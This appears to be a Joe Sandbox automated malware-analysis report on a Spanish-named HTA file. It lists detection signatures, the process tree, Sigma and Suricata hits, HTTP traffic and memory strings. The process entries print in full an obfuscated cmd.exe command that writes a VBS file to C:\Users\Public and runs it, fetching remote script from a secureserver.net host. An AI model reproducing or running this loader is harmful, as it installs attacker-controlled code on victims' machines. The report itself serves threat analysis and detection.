Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Archivo-PxFkiLTWYG-23122024095010.hta

Overview

General Information

Sample name:Archivo-PxFkiLTWYG-23122024095010.hta
Analysis ID:1579831
MD5:74903ec7a266a9d8d2c5d96d8b9b4965
SHA1:c425469eaa1d275f7a30314298a665fc553d5b33
SHA256:78df7fdcf6d5a0e70aee7d295f976dabb99c5dd1327fcb82fea548e578897f78
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Command shell drops VBS files
Installs new ROOT certificates
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Writes many files with high entropy
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w7x64
  • mshta.exe (PID: 3520 cmdline: mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
    • cmd.exe (PID: 3980 cmdline: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cmd.exe (PID: 4004 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cmd.exe (PID: 4012 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs" MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 4020 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 4028 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs" MD5: AD7B9C14083B52BC532FBA5948342B98)
          • cmd.exe (PID: 4036 cmdline: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs MD5: AD7B9C14083B52BC532FBA5948342B98)
            • wscript.exe (PID: 4056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 4056, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49218
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4036, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 4056, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3520, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ProcessId: 3980, ProcessName: cmd.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4036, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 4056, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4012, TargetFilename: C:\Users\Public\cNOV.vbs
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 4056, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49218
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4036, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 4056, ProcessName: wscript.exe
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 3520, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T10:28:01.038729+010020244491Attempted User Privilege Gain192.168.2.224921416.12.2.60443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.1% probability
Source: unknownHTTPS traffic detected: 142.250.181.130:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.2.60:443 -> 192.168.2.22:49214 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.5.234.55:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.205.57.102:443 -> 192.168.2.22:49218 version: TLS 1.2

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exeDomain query: 102.57.205.92.host.secureserver.net
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49214 -> 16.12.2.60:443
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: logs-referer.s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gtm[1].jsJump to behavior
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: logs-referer.s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 674e18cfc5d819f6a95bb6bf-3bfb3f4fe18561a7e617b6b7eb47e55814ca-79b4a48704bdhttps://www.facebook.com/americanascom674e18cfc5d819f6a95bb6bf-446a380a9865 equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.541246958.0000000005E25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}lP equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.541246958.0000000005E25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}lP equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.541246958.0000000005E25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}lP equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qn